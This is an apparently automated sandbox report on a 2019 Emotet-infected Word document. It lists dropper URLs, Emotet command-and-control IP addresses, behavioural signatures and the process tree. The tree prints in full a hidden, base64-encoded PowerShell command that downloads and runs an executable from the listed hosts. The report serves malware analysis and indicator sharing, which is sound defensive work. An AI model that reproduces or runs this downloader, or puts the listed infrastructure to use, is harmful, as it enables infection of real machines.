Analysis

  • max time kernel
    25s
  • resource
    win10v191014
  • submitted
    19-12-2019 07:48

General

  • Target

    5f3f1a765294d7c72934ad9b36f982d38cc9dc9312ef5221cbf391cd4292da79

  • Sample

    191219-s1yn94edd2

  • SHA256

    5f3f1a765294d7c72934ad9b36f982d38cc9dc9312ef5221cbf391cd4292da79

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://proyectoin.com/sushi/vipulg5517/

exe.dropper

http://reklamturk.net/wwvv2/n6d810122/

exe.dropper

http://radioyachting.com/thumbs/na1t448/

exe.dropper

http://redironmarketing.com/oscommerce/kisbe16464/

exe.dropper

http://wolfinpigsclothing.com/cgi-bin/a2s830/

Extracted

Family

emotet

C2

63.248.198.8:80

189.19.81.181:443

130.204.247.253:80

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

51.255.165.160:8080

118.36.70.245:80

190.210.184.138:995

188.135.15.49:80

139.162.118.88:8080

72.29.55.174:80

68.183.170.114:8080

181.231.62.54:80

192.241.146.84:8080

71.76.45.83:443

63.246.252.234:80

37.211.49.127:80

74.59.187.94:80

5.88.27.67:8080

rsa_pubkey.plain

Signatures

  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5f3f1a765294d7c72934ad9b36f982d38cc9dc9312ef5221cbf391cd4292da79.doc" /o ""
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:4924
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABXAHcAbQB0AHcAcABtAHkAbAB1AG4APQAnAEwAbAB0AHkAdQBsAHAAaAAnADsAJABIAGcAYwBsAHgAYwBuAHIAeAB2ACAAPQAgACcANAAwACcAOwAkAEYAegBuAG8AYQBlAG0AegA9ACcATQB6AHEAaQBwAG0AZQByAGEAbgAnADsAJABVAGUAeABpAHYAZABiAGwAYgByAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABIAGcAYwBsAHgAYwBuAHIAeAB2ACsAJwAuAGUAeABlACcAOwAkAEsAbQByAHUAdABkAGoAaQBmAD0AJwBMAG8AeABiAHkAeQBnAGgAbwAnADsAJABNAG8AYwBpAHIAagBrAHIAZQBpAGYAawA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAYgBjAGwASQBFAG4AdAA7ACQAVQBhAGgAYQBlAG0AaABlAGkAYQB4AHQAPQAnAGgAdAB0AHAAOgAvAC8AcAByAG8AeQBlAGMAdABvAGkAbgAuAGMAbwBtAC8AcwB1AHMAaABpAC8AdgBpAHAAdQBsAGcANQA1ADEANwAvACoAaAB0AHQAcAA6AC8ALwByAGUAawBsAGEAbQB0AHUAcgBrAC4AbgBlAHQALwB3AHcAdgB2ADIALwBuADYAZAA4ADEAMAAxADIAMgAvACoAaAB0AHQAcAA6AC8ALwByAGEAZABpAG8AeQBhAGMAaAB0AGkAbgBnAC4AYwBvAG0ALwB0AGgAdQBtAGIAcwAvAG4AYQAxAHQANAA0ADgALwAqAGgAdAB0AHAAOgAvAC8AcgBlAGQAaQByAG8AbgBtAGEAcgBrAGUAdABpAG4AZwAuAGMAbwBtAC8AbwBzAGMAbwBtAG0AZQByAGMAZQAvAGsAaQBzAGIAZQAxADYANAA2ADQALwAqAGgAdAB0AHAAOgAvAC8AdwBvAGwAZgBpAG4AcABpAGcAcwBjAGwAbwB0AGgAaQBuAGcALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBhADIAcwA4ADMAMAAvACcALgAiAHMAcABgAEwAaQBUACIAKAAnACoAJwApADsAJABaAGwAZABxAGYAegBrAHEAYQBiAGoAPQAnAEIAdwBmAGwAagBwAHgAZQByAHMAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAWgBnAG4AaAB4AG0AeABoAGgAawBsAHIAbwAgAGkAbgAgACQAVQBhAGgAYQBlAG0AaABlAGkAYQB4AHQAKQB7AHQAcgB5AHsAJABNAG8AYwBpAHIAagBrAHIAZQBpAGYAawAuACIARABPAHcAbgBgAGwAYABvAGAAQQBkAEYASQBMAEUAIgAoACQAWgBnAG4AaAB4AG0AeABoAGgAawBsAHIAbwAsACAAJABVAGUAeABpAHYAZABiAGwAYgByACkAOwAkAEsAZwBzAHQAZwBkAHIAdQBuAGYAcgBkAD0AJwBZAG8AdQBmAGIAcQBpAGEAYgBzACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVQBlAHgAaQB2AGQAYgBsAGIAcgApAC4AIgBMAEUAYABOAGcAYABUAEgAIgAgAC0AZwBlACAAMwA2ADIAMAA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAUgBUACIAKAAkAFUAZQB4AGkAdgBkAGIAbABiAHIAKQA7ACQAUwBsAGgAdAB5AHYAbgBvAGUAeQBnAHUAZwA9ACcATgBxAG8AaQBsAGYAegBwAHcAbQBkAGQAJwA7AGIAcgBlAGEAawA7ACQARQBhAHkAaQBlAHoAaQBmAG0AcwA9ACcAVgB0AHEAbgBrAHYAagBvAG0AbAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABNAHUAdAB3AGwAaAB1AHMAZABlAD0AJwBJAG0AYwBoAGwAaQBlAHYAYQBiAGoAZgB6ACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    PID:1860
    • C:\Users\Admin\40.exe
      "C:\Users\Admin\40.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:3764
      • C:\Users\Admin\40.exe
        --46929366
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious behavior: EmotetMutantsSpam
        PID:4736

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3764-10-0x0000000000A80000-0x0000000000A97000-memory.dmp

    Filesize

    92KB

  • memory/4736-13-0x0000000002290000-0x00000000022A7000-memory.dmp

    Filesize

    92KB

  • memory/4736-14-0x0000000000400000-0x00000000004A7000-memory.dmp

    Filesize

    668KB